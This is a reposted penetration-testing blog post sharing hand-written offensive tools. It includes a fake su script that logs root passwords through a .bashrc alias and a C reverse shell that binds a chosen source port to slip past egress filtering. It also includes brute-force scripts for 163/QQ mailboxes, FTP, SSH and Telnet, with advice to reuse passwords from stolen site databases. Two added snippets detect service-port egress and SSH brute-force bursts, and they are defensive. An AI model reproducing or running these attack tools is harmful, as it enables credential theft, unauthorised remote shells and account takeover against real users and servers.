0x00

During a penetration test the tools you find often do not fit the situation, and writing your own code is the way to go. The three programs below were all written by hand during engagements when no suitable tool could be found online. They are short and practical; please enjoy and rate them.

0x01

A small tool for recording the root password

root.py

#!/usr/bin/python
import os, sys, getpass, time

current_time = time.strftime("%Y-%m-%d %H:%M")
logfile = "/dev/shm/.su.log"              # the captured password is recorded here
#CentOS
#fail_str = "su: incorrect password"
#Ubuntu
#fail_str = "su: Authentication failure"
#For Linux Korea (CentOS, Ubuntu and Korean Linux print different messages when switching to root fails)
fail_str = "su: incorrect password"
try:
    passwd = getpass.getpass(prompt='Password: ')
    file = open(logfile, 'a')
    file.write("[%s]\t%s" % (passwd, current_time))   # record the root password
    file.write('\n')
    file.close()
except:
    pass
time.sleep(1)
print fail_str                               # print the "switch to root failed" message

When you have obtained a low-privileged shell on a Linux box and privilege escalation has failed, upload this program and add the line alias su='/usr/root.py' to the .bashrc of a low-privileged user; when that user runs su root, the password is recorded. See the script for the path of the password log.

0x02

Reverse shell with a chosen source port

While penetrating a Linux server, a reverse connection to port 888 failed, and ports 53 and 80 failed as well. A ping to Baidu went through, so there is only one explanation: the server is restricted so that only connections with certain source ports may go out. For example, only packets addressed to port 80 are accepted, and replies are sent out with 80 as the source port.

Googling turned up no program for this, so after reading the relevant APIs I wrote one.

client-port.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void error(char *msg)
{
        perror(msg);
        exit(1);
}
int main(int argc, char *argv[])
{
        int sockfd, portno, lportno;
        struct sockaddr_in serv_addr;
        struct sockaddr_in client_addr;
        struct hostent *server;
        if (argc < 4) {
                fprintf(stderr, "usage %s hostname port LocalPort\n", argv[0]);
                exit(1);
        }                          /* three arguments: target host, target port, local source port */
        portno = atoi(argv[2]);
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd < 0)
                error("ERROR opening socket");

        bzero((char *) &client_addr, sizeof(client_addr));
        lportno = atoi(argv[3]);
        client_addr.sin_family = AF_INET;
        client_addr.sin_addr.s_addr = INADDR_ANY;
        client_addr.sin_port = htons(lportno);         /* set the source port */
        if (bind(sockfd, (struct sockaddr *) &client_addr,
                                sizeof(client_addr)) < 0)
                error("ERROR on binding");

        server = gethostbyname(argv[1]);
        if (server == NULL) {
                fprintf(stderr, "ERROR, no such host\n");
                exit(1);
        }
        bzero((char *) &serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        bcopy((char *)server->h_addr,
                        (char *)&serv_addr.sin_addr.s_addr,
                        server->h_length);
        serv_addr.sin_port = htons(portno);
        if (connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0)   /* connect */
                error("ERROR connecting");
        dup2(sockfd, 0);
        dup2(sockfd, 1);
        dup2(sockfd, 2);
        execl("/bin/sh", "sh", "-i", (char *) NULL);                        /* run the shell */
        close(sockfd);
        return 0;
}

Usage:

gcc client-port.c -o port

chmod +x port

./port your-IP your-listening-port local-source-port

e.g. ./port http://www.91ri.org 80 80

The shell came back and privilege escalation succeeded.
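From the defender's side, an egress rule that matches only on source port (as described above) still leaves a clear signal in any stateful firewall or flow log: a new outbound TCP connection whose source port is a service port. The checker below is an added example, not code from the post; the iptables-LOG-style lines, the 10.0.0.0/8 internal range and the service-port set are constructed assumptions.

```python
import ipaddress
import re

# Assumptions: the local network and the ports a server would normally only listen on.
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")
SERVICE_PORTS = {22, 25, 53, 80, 443}
FIELD_RE = re.compile(r"\b(SRC|DST|PROTO|SPT|DPT)=(\S+)")
FLAG_RE = re.compile(r"\b(SYN|ACK|FIN|RST)\b")


def parse_fields(line):
    """Pick the key=value fields we need out of an iptables LOG style line."""
    return dict(FIELD_RE.findall(line))


def is_service_port_egress(line):
    """True for a new outbound TCP connection (SYN without ACK) that leaves the
    internal network using a service port as its *source* port."""
    f = parse_fields(line)
    if f.get("PROTO") != "TCP":
        return False
    flags = set(FLAG_RE.findall(line))
    if "SYN" not in flags or "ACK" in flags:   # replies (SYN/ACK) are normal server traffic
        return False
    try:
        src = ipaddress.ip_address(f["SRC"])
        dst = ipaddress.ip_address(f["DST"])
        spt = int(f["SPT"])
    except (KeyError, ValueError):
        return False
    return src in INTERNAL_NET and dst not in INTERNAL_NET and spt in SERVICE_PORTS


def find_service_port_egress(lines):
    """Return (src, dst, spt, dpt) for every flagged line."""
    hits = []
    for line in lines:
        if is_service_port_egress(line):
            f = parse_fields(line)
            hits.append((f["SRC"], f["DST"], int(f["SPT"]), int(f["DPT"])))
    return hits


# Constructed sample firewall log lines (not real traffic).
SAMPLE_LOG = [
    "kernel: OUT=eth0 SRC=10.0.0.5 DST=203.0.113.7 PROTO=TCP SPT=80 DPT=80 WINDOW=64240 SYN URGP=0",
    "kernel: OUT=eth0 SRC=10.0.0.5 DST=203.0.113.9 PROTO=TCP SPT=51234 DPT=443 WINDOW=64240 SYN URGP=0",
    "kernel: IN=eth0 SRC=198.51.100.4 DST=10.0.0.5 PROTO=TCP SPT=40000 DPT=80 WINDOW=65535 SYN URGP=0",
    "kernel: OUT=eth0 SRC=10.0.0.5 DST=198.51.100.4 PROTO=TCP SPT=80 DPT=40000 WINDOW=64240 ACK SYN URGP=0",
    "kernel: OUT=eth0 SRC=10.0.0.5 DST=203.0.113.7 PROTO=UDP SPT=53 DPT=53 LEN=48",
]

if __name__ == "__main__":
    for src, dst, spt, dpt in find_service_port_egress(SAMPLE_LOG):
        print("outbound connection from service port: %s:%d -> %s:%d" % (src, spt, dst, dpt))
```

The real fix is a stateful egress policy (allow replies to established inbound connections, deny new outbound connections from server ports) rather than matching on the source port alone.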

0x03 Mailbox brute-force script

Sometimes you need to brute-force a batch of mailboxes.

Burp163.pl

#!/usr/bin/perl
use Net::POP3;
$email="pop.163.com";          # set the POP server address; for QQ mail it is pop.qq.com
$pop = Net::POP3->new($email) or die("ERROR: Unable to initiate. ");
print $pop->banner();
$pop->quit;
$i = 0;
open(FP1, "<", "user.txt") or die("ERROR: cannot open user.txt");
@array1 = <FP1>;
open(FP2, "<", "pass.txt") or die("ERROR: cannot open pass.txt");
@array2 = <FP2>;                     # read the mailbox user names and passwords from the files
foreach $line_u (@array1) {
    chomp($u = $line_u);             # strip the trailing newline
    $u = $u . '@163.com';
    foreach $line_p (@array2) {
        chomp($p = $line_p);
        print "trying " . $u . "-----" . $p . "\n";
        $i = $i + 1;
        $pop = Net::POP3->new($email) or die("ERROR: Unable to initiate. ");
        $m = $pop->login($u, $p);    # try to log in; login() returns undef on failure
        if (defined $m)
        {
            print $u . "------------" . $p . "----" . "success" . "\n";
            $pop->quit;
        }                            # login succeeded
        else
        {
            print $u . "------------" . $p . "----" . "failed" . "\n";
            $pop->quit;              # login failed
        }
    }
}
print $i;

Usage: write the POP server of the mailboxes to be brute-forced into the line below (the default is 163 mail):

$email="pop.163.com";

Then put the mailbox addresses with the part after @ removed (e.g. lusiyu@163.com becomes lusiyu) into user.txt in the same directory, and put the dictionary into pass.txt.

You may say: isn't this a bit pointless, what if the mailbox password is complex?

Heh.

Get hold of the database of some small site, and use this program to batch-test whether those passwords are also the mailbox passwords. Heh.

I said nothing.

0x04

These three programs are for technical research only; the author accepts no responsibility if readers use them for illegal purposes.

In penetration testing, password cracking is unavoidable. http://www.91ri.org/8696.html

0x01

FTP brute-force script

#!/usr/bin/env python
#-*-coding = utf-8-*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@2012-05-08

import sys, os, time
from ftplib import FTP
docs = """
           [*] This was written for educational purpose and pentest only. Use it at your own risk.
           [*] Author will be not responsible for any damage!
           [*] Toolname : ftp_bf.py
           [*] Coder :
           [*] Version : 0.1
           [*] example of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
       """

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)
R = "\033[31m"
G = "\033[32m"
Y = "\033[33m"
END = "\033[0m"

def logo():
    print G+"\n |---------------------------------------------------------------|"
    print " | |"
    print " | blog.sina.com.cn/kaiyongdeng |"
    print " | 08/05/2012 ftp_bf.py v.0.1 |"
    print " | FTP Brute Forcing Tool |"
    print " | |"
    print " |---------------------------------------------------------------|\n"
    print " \n [-] %s\n" % time.strftime("%X")
    print docs+END

def help():
    print R+"[*]-t, --target ip/hostname <> Our target"
    print "[*]-u, --usernamelist usernamelist <> usernamelist path"
    print "[*]-p, --passwordlist passwordlist <> passwordlist path"
    print "[*]-h, --help help <> print this help"
    print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END
    sys.exit(1)

def bf_login(hostname, username, password):
    # Try one user/password pair; return 1 on success, 0 on failure.
    try:
        ftp = FTP(hostname)
        ftp.login(username, password)     # FTP.login takes (user, passwd), not the hostname
        ftp.retrlines('LIST')
        ftp.quit()
        print Y+"\n[!] w00t,w00t!!! We did it ! "
        print "[+] Target : ", hostname, ""
        print "[+] User : ", username, ""
        print "[+] Password : ", password, ""+END
        return 1
    except KeyboardInterrupt:
        print R+"\n[-] Exiting ...\n"+END
        sys.exit(1)
    except Exception, e:
        return 0

def anon_login(hostname):
    try:
        print G+"\n[!] Checking for anonymous login.\n"+END
        ftp = FTP(hostname)
        ftp.login()
        ftp.retrlines('LIST')
        print Y+"\n[!] w00t,w00t!!! Anonymous login successful !\n"+END
        ftp.quit()
    except Exception, e:
        print R+"\n[-] Anonymous login failed...\n"+END

def main():
    logo()
    hostname = usernamelist = passwordlist = None
    try:
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
        if len(sys.argv) <= 1 or not (hostname and usernamelist and passwordlist):
            help()
    except (IndexError, ValueError):
        print R+"[-]Check your parameters input\n"+END
        help()

    print G+"[!] BruteForcing target ..."+END
    anon_login(hostname)
    try:
        usernames = open(usernamelist, "r")
        user = [line.strip() for line in usernames.readlines()]
        usernames.close()
    except:
        print R+"\n[-] Check your usernamelist path\n"+END
        sys.exit(1)

    try:
        passwords = open(passwordlist, "r")
        pwd = [line.strip() for line in passwords.readlines()]
        passwords.close()
    except:
        print R+"\n[-] Check your passwordlist path\n"+END
        sys.exit(1)

    print G+"\n[+] Loaded:", len(user), "usernames"
    print "\n[+] Loaded:", len(pwd), "passwords"
    print "[+] Target:", hostname
    print "[+] Guessing...\n"+END
    found = 0
    for u in user:
        for p in pwd:
            result = bf_login(hostname, u, p)
            if result != 1:
                print G+"[+]Attempt username:%s password:%s..." % (u, p) + R+"Disenable"+END
            else:
                print G+"[+]Attempt username:%s password:%s..." % (u, p) + Y+"Enable"+END
                found = 1
    if not found:   # reported once, after the whole list has been tried
        print R+"\n[-]There is no username and password enabled in the list."
        print "[-]Exiting...\n"+END

if __name__ == "__main__":
    main()

0x02

SSH brute-force

#!/usr/bin/env python
#-*-coding = UTF-8-*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng


import sys
import os
import time
#from threading import Thread

R = "\033[31m"
G = "\033[32m"
Y = "\033[33m"
END = "\033[0m"

try:
    from paramiko import SSHClient
    from paramiko import AutoAddPolicy
except ImportError:
    print G+'''
    You need paramiko module.
    http://www.lag.net/paramiko/
    Debian/Ubuntu: sudo apt-get install aptitude
         : sudo aptitude install python-paramiko\n'''+END
    sys.exit(1)

docs =  """
            [*] This was written for educational purpose and pentest only. Use it at your own risk.
            [*] Author will be not responsible for any damage!
            [*] Toolname        : ssh_bf.py
            [*] Author          : xfk
            [*] Version         : v.0.2
            [*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
    """


if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)


def logo():
    print G+"\n                  |---------------------------------------------------------------|"
    print "                 |                                                               |"
    print "                 |               blog.sina.com.cn/kaiyongdeng                    |"
    print "                 |                16/05/2012 ssh_bf.py v.0.2                     |"
    print "                 |                  SSH Brute Forcing Tool                       |"
    print "                 |                                                               |"
    print "                 |---------------------------------------------------------------|\n"
    print " \n                      [-] %s\n" % time.ctime()
    print docs+END


def help():
    print Y+"        [*]-T         --target               <>the target hostname or ip address"
    print "        [*]-P         --port                 <>the ssh service port(default is 22)"
    print "        [*]-U         --userlist             <>usernames list file"
    print "        [*]-W         --wordlist             <>passwords list file"
    print "        [*]-H         --help                 <>show help information"
    print "        [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]" % sys.argv[0]+END
    sys.exit(1)

def BruteForce(hostname, port, username, password):
    '''
    Create SSH connection to target
    '''
    ssh = SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
        ssh.connect(hostname, port, username, password, pkey=None, timeout=None, allow_agent=False, look_for_keys=False)
        status = 'ok'
        ssh.close()
    except Exception, e:
        status = 'error'
    return status


def makelist(file):
    '''
    Make usernames and passwords lists
    '''
    items = []

    try:
        fd = open(file, 'r')
    except IOError:
        print R+'unable to read file \'%s\'' % file+END
        sys.exit(1)
    except Exception, e:
        print R+'unknown error'+END
        sys.exit(1)

    for line in fd.readlines():
        item = line.replace('\n', '').replace('\r', '')
        items.append(item)
    fd.close()
    return items

def main():
    logo()
    hostname = userlist = wordlist = None
    port = 22                       # default SSH port, as the help text says
    try:
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
            elif arg.lower() == '-p' or arg.lower() == '--port':
                port = int(sys.argv[int(sys.argv[1:].index(arg))+2])   # paramiko expects an integer port
            elif arg.lower() == '-u' or arg.lower() == '--userlist':
                userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
        if len(sys.argv) <= 1 or not (hostname and userlist and wordlist):
            help()
    except (IndexError, ValueError):
        print R+"[-]Check your parameters input\n"+END
        help()
    print G+"\n[!] BruteForcing target ...\n"+END
    usernamelist = makelist(userlist)
    passwordlist = makelist(wordlist)

    print Y+"[*] SSH Brute Force Preparing."
    print "[*] %s user(s) loaded." % str(len(usernamelist))
    print "[*] %s password(s) loaded." % str(len(passwordlist))
    print "[*] Brute Force Is Starting......."+END
    try:
        for username in usernamelist:
            for password in passwordlist:
                print G+"\n[+]Attempt username:%s password:%s..." % (username, password)+END
                current = BruteForce(hostname, port, username, password)
                if current == 'error':
                    print R+"[-]O*O The username:%s and password:%s Is Disabled...\n" % (username, password)+END
                else:
                    print G+"\n[+] ^-^ HaHa,We Got It!!!"
                    print "[+] username: %s" % username
                    print "[+] password: %s\n" % password+END
#                   sys.exit(0)
    except:
        print R+"\n[-] There Is Something Wrong,Please Check It."
        print "[-] Exiting.....\n"+END
        raise
    print Y+"[+] Done.^-^\n"+END
    sys.exit(0)


if __name__ == "__main__":
    main()

0x03

TELNET password brute-force

#!/usr/bin/python
#Telnet Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, telnetlib
from copy import copy

if len(sys.argv) != 4:
    print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
    sys.exit(1)

try:
    users = open(sys.argv[2], "r").readlines()
except(IOError):
    print "Error: Check your userlist path\n"
    sys.exit(1)

try:
    words = open(sys.argv[3], "r").readlines()
except(IOError):
    print "Error: Check your wordlist path\n"
    sys.exit(1)

print "\n\t   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:", sys.argv[1]
print "[+] Users Loaded:", len(users)
print "[+] Words Loaded:", len(words), "\n"

wordlist = copy(words)
lock = threading.Lock()          # one shared lock; a new lock per call would protect nothing

def reloader():
    for word in wordlist:
        words.append(word)

def getword():
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words, 1)
        words.remove(value[0])
    else:
        print "\nReloading Wordlist - Changing User\n"
        reloader()
        value = random.sample(words, 1)
        words.remove(value[0])
        users.remove(users[0])
    lock.release()
    if len(users) == 1:
        return value[0][:-1], users[0]
    else:
        return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

    def run(self):
        value, user = getword()
        try:
            print "-"*12
            print "User:", user, "Password:", value
            tn = telnetlib.Telnet(sys.argv[1])
            tn.read_until("login: ")
            tn.write(user + "\n")
            if value:                        # only send a password when the word is not empty
                tn.read_until("Password: ")
                tn.write(value + "\n")
            tn.write("ls\n")
            tn.write("exit\n")
            print tn.read_all()
            print "\t\nLogin successful:", value, user
            tn.close()
            sys.exit(2)                      # raises SystemExit in this thread only
        except:
            pass

for I in range(len(words)*len(users)):
    work = Worker()
    work.start()
    time.sleep(1)
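The FTP, SSH and Telnet scripts above all produce the same signature on the target: a burst of failed logins from one source address against one or more accounts. The detector below is an added example, not code from the post: it parses sshd "Failed password" lines from auth.log and flags any source IP with at least five failures inside a 60-second sliding window. The log excerpt and the year (syslog timestamps carry none) are constructed assumptions; for FTP or telnet daemons only the regular expression changes.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd "Failed password" lines as written to auth.log (syslog timestamp has no year).
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failures(lines, year=2014):
    """Return (timestamp, source_ip, username) for each failed-login line.
    `year` is an assumption because the syslog timestamp does not carry one."""
    events = []
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
            events.append((ts, m.group("ip"), m.group("user")))
    return events


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: {"attempts": n, "users": [...]}} for every source IP that
    produced at least `threshold` failures inside any `window_seconds` span."""
    by_ip = defaultdict(list)
    for ts, ip, user in parse_failures(lines):
        by_ip[ip].append((ts, user))
    alerts = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):          # sliding window over sorted attempts
            while (attempts[end][0] - attempts[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                users = sorted({u for _, u in attempts[start:end + 1]})
                alerts[ip] = {"attempts": end - start + 1, "users": users}
                break
    return alerts


# Constructed auth.log excerpt (not a real capture).
SAMPLE_AUTH_LOG = """\
Oct  5 10:00:01 host sshd[1234]: Failed password for root from 203.0.113.5 port 50001 ssh2
Oct  5 10:00:03 host sshd[1235]: Failed password for root from 203.0.113.5 port 50002 ssh2
Oct  5 10:00:05 host sshd[1236]: Failed password for invalid user admin from 203.0.113.5 port 50003 ssh2
Oct  5 10:00:07 host sshd[1237]: Failed password for invalid user admin from 203.0.113.5 port 50004 ssh2
Oct  5 10:00:09 host sshd[1238]: Failed password for root from 203.0.113.5 port 50005 ssh2
Oct  5 10:00:12 host sshd[1239]: Accepted password for alice from 192.0.2.10 port 50010 ssh2
Oct  5 10:30:00 host sshd[1240]: Failed password for bob from 192.0.2.10 port 50011 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print("%s: %d failures in 60s against %s" % (ip, info["attempts"], ", ".join(info["users"])))
```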

Reposted from: https://www.cnblogs.com/btlulu/articles/4001174.html
